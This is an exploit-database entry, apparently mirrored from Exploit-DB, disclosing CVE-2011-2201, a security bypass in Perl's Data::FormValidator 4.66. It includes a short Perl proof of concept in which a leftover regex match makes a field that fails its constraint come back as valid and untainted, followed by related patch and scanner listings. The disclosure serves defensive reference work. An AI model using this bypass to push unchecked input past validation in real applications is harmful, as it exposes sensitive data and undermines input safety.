Lucene search
DstEDB-ID:35836HistoryJun 08, 2011 - 12:00 a.m.
Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass
2011-06-0800:00:00
dst
www.exploit-db.com
13
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/48167/info
The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
#!/opt/perl/5.12/bin/perl
use strict;
use warnings;
use Data::FormValidator;
"some_unrelated_string" =~ m/^.*$/;
my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};
my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');Related
openvas
openvas
Fedora Update for perl-Data-FormValidator FEDORA-2011-11680
2012-04-02 00:00:00
Fedora Update for perl-Data-FormValidator FEDORA-2011-11805
2011-09-12 00:00:00
Fedora Update for perl-Data-FormValidator FEDORA-2011-11756
2011-09-12 00:00:00
nessus
nessus
Fedora 16 : perl-Data-FormValidator-4.66-6.fc16 (2011-11680)
2011-09-07 00:00:00
Fedora 15 : perl-Data-FormValidator-4.66-6.fc15 (2011-11756)
2011-09-09 00:00:00
Fedora 14 : perl-Data-FormValidator-4.66-6.fc14 (2011-11805)
2011-09-09 00:00:00
fedora
fedora
[SECURITY] Fedora 16 Update: perl-Data-FormValidator-4.66-6.fc16
2011-09-07 03:41:30
[SECURITY] Fedora 15 Update: perl-Data-FormValidator-4.66-6.fc15
2011-09-08 06:59:58
[SECURITY] Fedora 14 Update: perl-Data-FormValidator-4.66-6.fc14
2011-09-08 07:00:31
prion
prion
Input validation
2011-09-14 16:05:00
cvelist
cvelist
CVE-2011-2201
2011-09-14 15:00:00
cve
cve
CVE-2011-2201
2011-09-14 16:05:23
ubuntucve
ubuntucve
CVE-2011-2201
2011-09-14 00:00:00
debiancve
debiancve
CVE-2011-2201
2011-09-14 16:05:23
nvd
nvd
CVE-2011-2201
2011-09-14 16:05:23